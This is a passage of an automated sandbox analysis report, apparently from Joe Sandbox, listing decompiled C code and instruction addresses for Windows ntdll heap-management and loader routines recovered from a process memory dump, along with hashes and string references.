						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E0112A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E0112A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E01087D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E01121582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E01087D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E01121582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E0108B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E0108BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E0112A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                                                                                            0x0108b486
                                                                                                            0x0108b48a
                                                                                                            0x0108b48e
                                                                                                            0x0108b491
                                                                                                            0x0108b493
                                                                                                            0x0108b49a
                                                                                                            0x0108b49c
                                                                                                            0x0108b4a2
                                                                                                            0x0108b4a7
                                                                                                            0x0108b6fc
                                                                                                            0x0108b6fc
                                                                                                            0x0108b6b3
                                                                                                            0x0108b6c3
                                                                                                            0x0108b6c3
                                                                                                            0x0108b4b4
                                                                                                            0x010d294f
                                                                                                            0x010d2951
                                                                                                            0x010d2957
                                                                                                            0x010d295d
                                                                                                            0x010d2961
                                                                                                            0x010d2980
                                                                                                            0x010d2985
                                                                                                            0x010d2963
                                                                                                            0x010d2978
                                                                                                            0x010d297d
                                                                                                            0x010d298b
                                                                                                            0x010d2990
                                                                                                            0x010d2995
                                                                                                            0x010d299d
                                                                                                            0x010d29a1
                                                                                                            0x010d29a2
                                                                                                            0x010d29a2
                                                                                                            0x010d29a7
                                                                                                            0x010d29a7
                                                                                                            0x010d2951
                                                                                                            0x0108b4ba
                                                                                                            0x0108b4ba
                                                                                                            0x0108b4bd
                                                                                                            0x0108b4c2
                                                                                                            0x0108b6d4
                                                                                                            0x0108b4c8
                                                                                                            0x0108b4c8
                                                                                                            0x0108b4c8
                                                                                                            0x0108b4cd
                                                                                                            0x0108b4d0
                                                                                                            0x0108b4d9
                                                                                                            0x0108b4df
                                                                                                            0x0108b4e2
                                                                                                            0x010d29b7
                                                                                                            0x010d29bd
                                                                                                            0x00000000
                                                                                                            0x0108b4e8
                                                                                                            0x0108b4e8
                                                                                                            0x0108b4ef
                                                                                                            0x0108b4fa
                                                                                                            0x0108b703
                                                                                                            0x0108b709
                                                                                                            0x0108b70b
                                                                                                            0x0108b711
                                                                                                            0x0108b711
                                                                                                            0x0108b70b
                                                                                                            0x0108b503
                                                                                                            0x0108b50c
                                                                                                            0x0108b511
                                                                                                            0x0108b514
                                                                                                            0x0108b519
                                                                                                            0x010d29c5
                                                                                                            0x010d29c7
                                                                                                            0x010d29cc
                                                                                                            0x010d29cd
                                                                                                            0x010d29cf
                                                                                                            0x010d29d0
                                                                                                            0x010d29d2
                                                                                                            0x010d29d7
                                                                                                            0x010d29d9
                                                                                                            0x010d29ee
                                                                                                            0x010d29ee
                                                                                                            0x010d29f4
                                                                                                            0x010d29fa
                                                                                                            0x010d2a01
                                                                                                            0x00000000
                                                                                                            0x010d2a01
                                                                                                            0x010d29db
                                                                                                            0x010d29df
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d29e1
                                                                                                            0x010d29e4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d29e6
                                                                                                            0x010d29e6
                                                                                                            0x0108b51f
                                                                                                            0x0108b51f
                                                                                                            0x0108b520
                                                                                                            0x0108b525
                                                                                                            0x0108b52b
                                                                                                            0x0108b52d
                                                                                                            0x0108b52e
                                                                                                            0x0108b530
                                                                                                            0x0108b535
                                                                                                            0x0108b53b
                                                                                                            0x0108b53d
                                                                                                            0x010d2a07
                                                                                                            0x00000000
                                                                                                            0x010d2a07
                                                                                                            0x0108b549
                                                                                                            0x0108b54e
                                                                                                            0x010d2a12
                                                                                                            0x010d2a15
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2a24
                                                                                                            0x0108b559
                                                                                                            0x0108b55c
                                                                                                            0x010d2a34
                                                                                                            0x010d2a3b
                                                                                                            0x010d2a4d
                                                                                                            0x010d2a4d
                                                                                                            0x010d2a3b
                                                                                                            0x0108b566
                                                                                                            0x0108b56b
                                                                                                            0x0108b56f
                                                                                                            0x0108b57b
                                                                                                            0x0108b582
                                                                                                            0x010d2a57
                                                                                                            0x010d2a5c
                                                                                                            0x010d2a5c
                                                                                                            0x0108b582
                                                                                                            0x0108b58b
                                                                                                            0x0108b58e
                                                                                                            0x0108b592
                                                                                                            0x0108b596
                                                                                                            0x0108b599
                                                                                                            0x0108b59b
                                                                                                            0x0108b59e
                                                                                                            0x0108b5a3
                                                                                                            0x0108b5a6
                                                                                                            0x0108b5a9
                                                                                                            0x010d2a66
                                                                                                            0x010d2a67
                                                                                                            0x010d2a73
                                                                                                            0x010d2a78
                                                                                                            0x0108b5b8
                                                                                                            0x0108b5b8
                                                                                                            0x0108b5bb
                                                                                                            0x0108b5bd
                                                                                                            0x0108b5bd
                                                                                                            0x0108b5c4
                                                                                                            0x0108b5f7
                                                                                                            0x0108b5f7
                                                                                                            0x0108b600
                                                                                                            0x0108b606
                                                                                                            0x0108b60c
                                                                                                            0x0108b612
                                                                                                            0x0108b618
                                                                                                            0x0108b621
                                                                                                            0x0108b623
                                                                                                            0x0108b629
                                                                                                            0x0108b629
                                                                                                            0x0108b62c
                                                                                                            0x0108b62f
                                                                                                            0x0108b633
                                                                                                            0x0108b636
                                                                                                            0x0108b639
                                                                                                            0x0108b71d
                                                                                                            0x0108b720
                                                                                                            0x0108b736
                                                                                                            0x0108b660
                                                                                                            0x0108b660
                                                                                                            0x0108b662
                                                                                                            0x0108b665
                                                                                                            0x0108b66a
                                                                                                            0x0108b6e6
                                                                                                            0x0108b6e7
                                                                                                            0x0108b6ea
                                                                                                            0x0108b6ef
                                                                                                            0x010d2ad1
                                                                                                            0x010d2ad2
                                                                                                            0x010d2ad8
                                                                                                            0x010d2add
                                                                                                            0x010d2add
                                                                                                            0x0108b6f5
                                                                                                            0x0108b6f5
                                                                                                            0x0108b672
                                                                                                            0x0108b675
                                                                                                            0x0108b67a
                                                                                                            0x010d2ae5
                                                                                                            0x010d2ae8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2af4
                                                                                                            0x010d2afc
                                                                                                            0x00000000
                                                                                                            0x0108b680
                                                                                                            0x0108b680
                                                                                                            0x0108b680
                                                                                                            0x0108b685
                                                                                                            0x0108b687
                                                                                                            0x0108b68a
                                                                                                            0x010d2b06
                                                                                                            0x010d2b0c
                                                                                                            0x010d2b13
                                                                                                            0x010d2b1e
                                                                                                            0x010d2b20
                                                                                                            0x010d2b2b
                                                                                                            0x010d2b2b
                                                                                                            0x010d2b2b
                                                                                                            0x010d2b34
                                                                                                            0x010d2b45
                                                                                                            0x010d2b45
                                                                                                            0x010d2b13
                                                                                                            0x0108b696
                                                                                                            0x0108b69b
                                                                                                            0x0108b6a0
                                                                                                            0x010d2b4f
                                                                                                            0x010d2b52
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2b61
                                                                                                            0x00000000
                                                                                                            0x0108b6a6
                                                                                                            0x0108b6a6
                                                                                                            0x0108b6a6
                                                                                                            0x0108b6a8
                                                                                                            0x0108b6ab
                                                                                                            0x010d2b70
                                                                                                            0x010d2b72
                                                                                                            0x010d2b7d
                                                                                                            0x010d2b7d
                                                                                                            0x010d2b7d
                                                                                                            0x010d2b86
                                                                                                            0x010d2b97
                                                                                                            0x010d2b97
                                                                                                            0x0108b6b1
                                                                                                            0x00000000
                                                                                                            0x0108b6b1
                                                                                                            0x0108b6a0
                                                                                                            0x0108b67a
                                                                                                            0x0108b722
                                                                                                            0x0108b722
                                                                                                            0x0108b655
                                                                                                            0x0108b65d
                                                                                                            0x00000000
                                                                                                            0x0108b5c6
                                                                                                            0x0108b5c6
                                                                                                            0x0108b5ce
                                                                                                            0x010d2a83
                                                                                                            0x010d2a97
                                                                                                            0x010d2a97
                                                                                                            0x010d2a9a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2a88
                                                                                                            0x010d2a8a
                                                                                                            0x010d2a8c
                                                                                                            0x010d2a8f
                                                                                                            0x010d2a92
                                                                                                            0x010d2aa1
                                                                                                            0x010d2aa1
                                                                                                            0x010d2aa2
                                                                                                            0x010d2aab
                                                                                                            0x010d2ab0
                                                                                                            0x00000000
                                                                                                            0x010d2ab0
                                                                                                            0x010d2a94
                                                                                                            0x010d2a94
                                                                                                            0x00000000
                                                                                                            0x010d2a9c
                                                                                                            0x0108b5d4
                                                                                                            0x0108b5d4
                                                                                                            0x0108b5d6
                                                                                                            0x0108b5d9
                                                                                                            0x0108b5de
                                                                                                            0x0108b5e1
                                                                                                            0x0108b5e4
                                                                                                            0x010d2ab8
                                                                                                            0x010d2ab9
                                                                                                            0x010d2ac4
                                                                                                            0x010d2ac9
                                                                                                            0x0108b5f2
                                                                                                            0x0108b5f2
                                                                                                            0x0108b5f4
                                                                                                            0x0108b5f4
                                                                                                            0x00000000
                                                                                                            0x0108b5e4
                                                                                                            0x0108b5c4
                                                                                                            0x0108b554
                                                                                                            0x0108b554
                                                                                                            0x00000000
                                                                                                            0x0108b554

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                            • API String ID: 0-4253913091
                                                                                                            • Opcode ID: 3dd9ee8771d144c2cc910a5df1ea57c9ffeba5f6a4d3a360eb461603980a519f
                                                                                                            • Instruction ID: 528b2dcd38cb96fbd4069f97cab79e102ce66970499fe0bb51e51aa9fd9e3087
                                                                                                            • Opcode Fuzzy Hash: 3dd9ee8771d144c2cc910a5df1ea57c9ffeba5f6a4d3a360eb461603980a519f
                                                                                                            • Instruction Fuzzy Hash: 76E19970604606DFDB19DF68C884BAEBBF5FF48304F1481A9E4929B391D734E981CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01078794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E01078794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0107934A() != 0) {
								_t159 = E010EA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1155780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E010E5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1155780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0107849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01078999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01078999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1155c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1155c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01082280(_t92, 0x11586cc);
															_t94 = E01139DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E010961A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1155c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01078A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1155c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1155c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E010AF380(_t136, 0x1041184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01082280(_t108, 0x11586cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E010961A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01139D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0107FFB0(_t118, _t156, 0x11586cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E010A9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                            0x01078799
                                                                                                            0x0107879d
                                                                                                            0x010787a1
                                                                                                            0x010787a3
                                                                                                            0x010787a8
                                                                                                            0x010787c3
                                                                                                            0x010787c3
                                                                                                            0x010787c8
                                                                                                            0x010787d1
                                                                                                            0x010787d4
                                                                                                            0x010787d8
                                                                                                            0x010787e5
                                                                                                            0x010787ec
                                                                                                            0x010c9bfe
                                                                                                            0x010c9c00
                                                                                                            0x010c9c02
                                                                                                            0x010c9c08
                                                                                                            0x010c9c0d
                                                                                                            0x010c9c0f
                                                                                                            0x010c9c14
                                                                                                            0x010c9c2d
                                                                                                            0x010c9c32
                                                                                                            0x010c9c37
                                                                                                            0x010c9c3a
                                                                                                            0x010c9c3c
                                                                                                            0x010c9c42
                                                                                                            0x010c9c42
                                                                                                            0x010c9c3c
                                                                                                            0x010c9c02
                                                                                                            0x010787da
                                                                                                            0x010787df
                                                                                                            0x010787e3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010787e3
                                                                                                            0x010787f2
                                                                                                            0x00000000
                                                                                                            0x010787fb
                                                                                                            0x010787fd
                                                                                                            0x010787fe
                                                                                                            0x0107880e
                                                                                                            0x0107880f
                                                                                                            0x01078810
                                                                                                            0x01078814
                                                                                                            0x0107881a
                                                                                                            0x0107881c
                                                                                                            0x0107881f
                                                                                                            0x01078821
                                                                                                            0x01078822
                                                                                                            0x01078824
                                                                                                            0x01078826
                                                                                                            0x0107882c
                                                                                                            0x0107882e
                                                                                                            0x010c9c48
                                                                                                            0x010c9c48
                                                                                                            0x01078834
                                                                                                            0x01078834
                                                                                                            0x01078837
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01078837
                                                                                                            0x0107882e
                                                                                                            0x0107883d
                                                                                                            0x01078840
                                                                                                            0x01078843
                                                                                                            0x01078846
                                                                                                            0x01078849
                                                                                                            0x0107884c
                                                                                                            0x0107884e
                                                                                                            0x01078850
                                                                                                            0x01078852
                                                                                                            0x01078854
                                                                                                            0x01078857
                                                                                                            0x010788b4
                                                                                                            0x010788b6
                                                                                                            0x010788b6
                                                                                                            0x01078859
                                                                                                            0x01078859
                                                                                                            0x01078859
                                                                                                            0x01078861
                                                                                                            0x01078866
                                                                                                            0x0107886a
                                                                                                            0x0107893d
                                                                                                            0x01078941
                                                                                                            0x00000000
                                                                                                            0x01078947
                                                                                                            0x01078947
                                                                                                            0x0107894a
                                                                                                            0x0107894c
                                                                                                            0x00000000
                                                                                                            0x01078952
                                                                                                            0x01078955
                                                                                                            0x0107895a
                                                                                                            0x0107895d
                                                                                                            0x0107895d
                                                                                                            0x0107895f
                                                                                                            0x01078961
                                                                                                            0x01078961
                                                                                                            0x01078968
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107896a
                                                                                                            0x0107896b
                                                                                                            0x0107896e
                                                                                                            0x00000000
                                                                                                            0x01078970
                                                                                                            0x01078970
                                                                                                            0x01078970
                                                                                                            0x01078970
                                                                                                            0x01078972
                                                                                                            0x01078972
                                                                                                            0x01078974
                                                                                                            0x00000000
                                                                                                            0x0107897a
                                                                                                            0x0107897a
                                                                                                            0x0107897d
                                                                                                            0x00000000
                                                                                                            0x01078983
                                                                                                            0x010c9c65
                                                                                                            0x010c9c6d
                                                                                                            0x010c9c72
                                                                                                            0x010c9c75
                                                                                                            0x010c9c75
                                                                                                            0x010c9c82
                                                                                                            0x010c9c86
                                                                                                            0x010c9c87
                                                                                                            0x010c9c88
                                                                                                            0x010c9c89
                                                                                                            0x010c9c8c
                                                                                                            0x010c9c90
                                                                                                            0x010c9c95
                                                                                                            0x010c9c97
                                                                                                            0x010c9ca0
                                                                                                            0x010c9ca3
                                                                                                            0x010c9ca9
                                                                                                            0x010c9ca9
                                                                                                            0x00000000
                                                                                                            0x010c9ca9
                                                                                                            0x010c9ca3
                                                                                                            0x00000000
                                                                                                            0x010c9c97
                                                                                                            0x0107897d
                                                                                                            0x00000000
                                                                                                            0x01078974
                                                                                                            0x01078988
                                                                                                            0x01078992
                                                                                                            0x01078996
                                                                                                            0x00000000
                                                                                                            0x01078996
                                                                                                            0x0107894c
                                                                                                            0x00000000
                                                                                                            0x01078870
                                                                                                            0x0107887b
                                                                                                            0x0107887d
                                                                                                            0x0107887f
                                                                                                            0x01078881
                                                                                                            0x01078884
                                                                                                            0x01078884
                                                                                                            0x01078886
                                                                                                            0x01078889
                                                                                                            0x0107888c
                                                                                                            0x0107888e
                                                                                                            0x01078891
                                                                                                            0x01078891
                                                                                                            0x01078898
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107889a
                                                                                                            0x0107889b
                                                                                                            0x0107889e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010788a0
                                                                                                            0x010788a8
                                                                                                            0x010788b0
                                                                                                            0x010788b2
                                                                                                            0x010788d3
                                                                                                            0x010788d5
                                                                                                            0x00000000
                                                                                                            0x010788d7
                                                                                                            0x010788db
                                                                                                            0x010788dc
                                                                                                            0x010788e0
                                                                                                            0x010788e8
                                                                                                            0x010788ee
                                                                                                            0x010788f0
                                                                                                            0x010788f3
                                                                                                            0x010788fc
                                                                                                            0x01078901
                                                                                                            0x01078906
                                                                                                            0x0107890c
                                                                                                            0x0107890c
                                                                                                            0x0107890f
                                                                                                            0x01078916
                                                                                                            0x01078917
                                                                                                            0x01078918
                                                                                                            0x01078919
                                                                                                            0x0107891a
                                                                                                            0x0107891f
                                                                                                            0x01078921
                                                                                                            0x010c9c52
                                                                                                            0x010c9c55
                                                                                                            0x010c9c5b
                                                                                                            0x010c9cac
                                                                                                            0x010c9cc0
                                                                                                            0x010c9cc0
                                                                                                            0x010c9c55
                                                                                                            0x01078927
                                                                                                            0x01078927
                                                                                                            0x0107892f
                                                                                                            0x01078933
                                                                                                            0x00000000
                                                                                                            0x010788f5
                                                                                                            0x010788f5
                                                                                                            0x00000000
                                                                                                            0x010788f7
                                                                                                            0x010788f7
                                                                                                            0x010788fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010788fa
                                                                                                            0x010788f5
                                                                                                            0x010788f3
                                                                                                            0x00000000
                                                                                                            0x010788d5
                                                                                                            0x00000000
                                                                                                            0x010788b2
                                                                                                            0x010788c9
                                                                                                            0x00000000
                                                                                                            0x010788c9
                                                                                                            0x0107887f
                                                                                                            0x0107886a
                                                                                                            0x01078857
                                                                                                            0x01078852
                                                                                                            0x010788bf
                                                                                                            0x010788bf
                                                                                                            0x010787aa
                                                                                                            0x010787ad
                                                                                                            0x010787ae
                                                                                                            0x010787b4
                                                                                                            0x010787b5
                                                                                                            0x010787b6
                                                                                                            0x010787b8
                                                                                                            0x010787bd
                                                                                                            0x010787c1
                                                                                                            0x010787f4
                                                                                                            0x010787fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010787c1
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 010C9C18
                                                                                                            • LdrpDoPostSnapWork, xrefs: 010C9C1E
